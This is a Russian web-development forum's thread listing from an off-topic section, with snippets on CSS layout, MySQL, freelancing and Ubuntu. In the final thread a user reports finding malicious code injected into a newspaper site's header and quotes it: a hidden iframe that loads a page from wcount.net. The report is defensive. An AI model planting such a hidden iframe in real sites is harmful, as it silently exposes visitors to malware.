Flame
2573 topics in this forum
-
- 9 replies
- 1.8k views
Сегодня у нашего коллеги, SelenIT'а день рождения! Илья, поздравляю! Чтобы все было здорово у тебя, не иссякали твои гениальные идеи, а энциклопедические знания стандартов продолжали наставлять всех нас на путь истинный!
Last reply by Николя223, -
- 6 replies
- 1.8k views
Удивил меня альфа банк, а точнее их подразделение альфа директ. цитирую кусочек ответа их специалиста Альфа-Директ не поддерживает другие браузеры кроме Internet Explorer. вот так вот практически в 2016 году некоторые компании просто не поддерживают того что им не интересно/неудобно и т.д
Last reply by wwt, -
- 7 replies
- 1.8k views
Думаю, что соригинальничал с новоей своей страничкой, но сомнения все же гложат. Зацените идею для сайта-портфолио, сделал основную верстку и немного адаптивности. http://zlodeev.tk/ поизменяйте размер экрана постепенно адаптивного там, только отображение и скрытие определенных участков при разных разрешениях. Короче, если одна из картинок пропадает, то появляется её заменитель в меню, которое будет сверху. Хотел заодно спросить, можно ли как-нибудь цельной кртинкой сделать подложку, чтобы получился такой эффект без нарезки и background-position?
Last reply by Struggle, -
- 5 replies
- 1.8k views
Что будет теперь, когда ненавистная и даже глубоко противная истинным сторонникам открытого софта компания Oracle купила многострадальную Sun, а заодно и наш с тобой любимый MySQL? Конец легендарного продукта? Может быть. Но уже сейчас есть куда более функциональные и полностью совместимые разработки! MySQL, он же просто "мускул". Бьюсь об заклад, что это единственная СУБД, которая по умолчанию доступна на вашем хостинге. Любимые движки для форума и блога работают на ней. Это фактически стандарт де-факто для любого веб-продукта. Да и в своих проектах вы, вероятнее всего, используете именно ее. В Сети миллионы сайтов осуществляют запросы и сохраняют данные в БД с помощью…
Last reply by Justnewone, -
IT зоопарк
by Svatov- 9 replies
- 1.8k views
Захотелось развеяться, нашел в сети смешную классификацию, решил разбавить на форуме обстановку...сразу говорю, может для кого-то и баян, но я не играю на гармони.. И да..спрятал под спойлер...так как есть местами ненормативная лексика
Last reply by Great Rash, -
- 7 replies
- 1.8k views
У нас есть фиксированный сайт, в нём есть блоки с закруглёнными углами. Я обычно Углы вырезаю и сами блоки делаю так, что-бы потом в будущем их можно было перенести даже на Резиновый сайт и они растянутся в любую сторону. Минус этого способа в том, что я использую определённое количество элементов div, что-бы блоки вобщем был бессмертные. Но вот тут недавно на форуме зашёл базар, что может в принципе и не нужно так заморачиваться и делать такие вещи в ФИксированном сайте, может просто эти Блоки делать из Трёх div, точнее просто брать вырезать Верх, Середину и Низ, но в таком случае блоки будут тянуться только вниз. Как же всё таки правильно поступать в таких случаях? И во…
Last reply by Zippovich, -
- 9 replies
- 1.8k views
Привет всем!!!! у меня в хедере на картинке прописывается название сайта. Как его отключить?
Last reply by CrazyOne, -
А почему я должна платить вам? Вы же фрилансер… Меня интересует разработка сайта-визитки. На нем должна быть возможность заказывать товары, оплачивать кредитной картой, регистрироваться, добавлять фотки и переписываться с друзьями. - А можно на нашем сайте сделать фон зеркальным, что бы пользователь заходил и видел своё отражение? И поставьте на макет изображения слонёнка в строительной одежде и каске с улыбкой извергающего из хобота бетон и раствор Вы дурак что ли — за логотип чертовы деньги требовать?! Вам тут не Кока-Кола, миллиарды транжирить! Мы и сами можем такую загазюлину нарисовать! 300 рублей — вот цена вашей работы за последний месяц!
Last reply by Vin, -
- 10 replies
- 1.8k views
Сегодня открылась новая группа в Facebook: css-live.ru css-live.ru - это сообщество веб-технологов, разговаривающих на языках HTML, CSS, JS. Вступайте, друзья! Милости просим! p.s. Был бы очень признателен распространению этой новости по всяким социальным сетям, т.е. там, где вы обычно обитаете
Last reply by psywalker, -
- 7 replies
- 1.8k views
Доброго все времени суток! Работал с css файлом и тут выключился компьютер, перезапустил, открываю сайт, а он не отображает стили. Захожу в css файл и вижу, вместо всех стилей написано слово NUL Просто пздс конечно Можно ли вернуть файл?? Скрин: Самое обидное это то, что сегодня уже хотел выкладывать сайт на Хостинг. Зашел в css что бы кое-что подправить. Копию файла не делал не когда, так как такого не было еще не разу.
Last reply by Simpsons, -
CSS 4
by Great Rash- 15 replies
- 1.8k views
Наткнулся на хабре :facepalmxd: слов нет
Last reply by SelenIT, -
- 10 replies
- 1.8k views
В одном маленьком макете блока, из раздела дизайнера любителя столкнулся с некоторым парадоксом относительно слоев, ответ на который я так и не нашел, хотя уверен, что решение где-то на поверхности. Ситуация...макет...удалил все лишнее, оставил проблемные участки. Имеем: Две группы (расположение такое же) (1) Группа с текстовым слоем (цвет такста красный) (2) Группа с фоновым слоем (пускай зальем зеленым) Что получаем: Группа с текстовым слоем меняет цвет, в результате непонятного мне смешивания, что влияет ...уже ума не приложу...перепробовал все, все стили вырубил, опции пересмотрел. По логике вещей, слой который выше просто накладывается на фон как в стеке, но здес…
Last reply by deadrash, -
- 4 replies
- 1.8k views
Нужна ваша помощь! Предисловие: На практике, в экстремальных условиях ( быстрое решение, сильный мороз, ограниченное время, все это в команде) мозг начинает судорожно работать и быстрее решает поставленные задачи. Так сложилось, теперь у меня свободны все сутки 24\7 , поставлена задача: научиться программировать до уровня работы в команде, я завален самым необходимым учебным материалом и прошло около 3 недель (+ 2 месяца изучение вне программирования). Просидев дома за монитором, практикуя и запоминая информацию, заметил, что материал стал усваиваться медленней- нет теперь той работы в команде и адреналина. *Витамины, режим и физическая активность(скалолазание) соблюдаю…
Last reply by nerv, -
- 3 replies
- 1.8k views
Для тех кому может быть случайно интересно (да, я давно тут не появлялся, я сволочь) я в Москве сегодня-завтра (13-14 июня сего года) чем заняться пока не знаю. Кто хочет выловить - пишите) или лучше звоните +7-911-0987239
Last reply by psywalker, -
- 11 replies
- 1.8k views
В общем-то у карты сайта в теории есть много плюсов, а именно возможность указать, какие страницы на сайте более приоритетны, как часто они обновляются, какие страницы индексировать надо, а какие нет и в теории ускорить индексацию сайта. А вопросы (внутри меня) в том, что страниц может быть и 10 и 20 тысяч и генерировать такую карту может быть накладно для системы, понятно, что система системе рознь, но генерировать везде придется. Улучшает ли карта позиции в выдаче ПС? Если есть карта, то перемещается ли роботы по сайту аналогично посетителям? Помогает ли вообще чем? Используете ли вы карту сайта (.xml) и если да, то как много страниц на тех сайтах на которых она есть? …
Last reply by Int, -
- 1 reply
- 1.8k views
Здравствуйте, уважаемые форумчане =) Столкнулся с такой проблемой: Нужно устроить распечатку с сайта картинки и текста - чтобы поместилось на 1 лист а4. Как я понимаю - есть 2а варианта: 1. Я текст помещаю в картинку. (что мне не совсем подходит) 2. Либо как-то программно заставляю принтер печатать картинку и текст на одном листике - при нажатии кнопки на сайте. Вопрос такой, - как осуществить 2ой вариант. Может кто-то сталкивался?
Last reply by Emm, -
- 4 replies
- 1.8k views
Ребята, помогите пожалуйста, узнал о БЭМ - методология верстки, очень хочу работать с БЭМ, но не могу найти нормального обучения или пояснения по этой технологии, может у кого есть какае то ИНФО???????????
Last reply by majron, -
- 10 replies
- 1.8k views
Года три назад периодически играл, когда заняться было нечем или чтобы отвлечься. Сейчас смотрю много дополнений разных появилось, русские официальные сервера, аддоны. Образовалась ностальгия Кто-нибудь играет в эту игру? P.S. Отличительная особенность игры - классный PvE (то есть реально интересно роль отигрывать) и отсутствие неадекватных школьников Может образуем гильдию htmlbook?
Last reply by Verder, -
- 6 replies
- 1.8k views
Кто-нибудь использовал медиа-запросы на живых проектах? Если да, то интересно было бы посмотреть, а то в рунете я таких сайтов еще не видел (не считая той студии, которая этим и занимается [названия не помню])
Last reply by ablay2009, -
- 9 replies
- 1.8k views
Были тут несколько тем на тему - как правильно скачать страницу. Никак не могу их найти, ключевые слова не приносят успехов. Извиняйте, что создаю целую тему по этому поводу, но, по другому как?
Last reply by Int, -
- 4 replies
- 1.8k views
Помогите пожалуйста с CuteNews! Как мне заставить выводить полную новость на другой странице? Кто-нить ею пользовался воообще?
Last reply by s0rr0w, -
- 10 replies
- 1.8k views
Посоветуйте что-нибудь толковое. Именно по дизайну. Не по вёрстке и не по юзабилити. Можно на английском, не принципиально.
Last reply by Justnewone, -
- 3 replies
- 1.8k views
Дано: ubuntu desktop edition и ubuntu server edition Назначение: тестовый сервер с php и mysql Какая версия лучше для этого назначения?
Last reply by vvsh, -
- 2 replies
- 1.8k views
msiexec.exe Установщик Windows . Вот он вылазиет и жрет. Как его закрыть и чтоб он больше не врубался? Заметил как включаю интернет - вылазиет в процессах "Установщик Windows" и убиваю его быстро. Надо чем-то закрыть его и чтоб он не вылазил больше. Что посоветуете?
Last reply by s0rr0w, -
- 4 replies
- 1.8k views
Всем привет! У меня скорее не вопрос, а сообщение. Сегодня утром, пришёл на работу, включаю комп, захожу на сайт нашей газеты, а антивирус выдаёт сообщение, что заблокировано соединение с вредоносным сайтом wcount.net. После проверки обнаружил в коде вот такую вставочку в шапке сайта: <html><body><div style="display:none"><iframe src="http://wcount.net/com/index.php" width="320" height="240"></iframe></div></body></html> Проблема не критическая, сейчас запустил востановление файлов и поменял все пароли. Просто интересно, кто-нибудь сталкивался с подобным?
Last reply by Shuranka,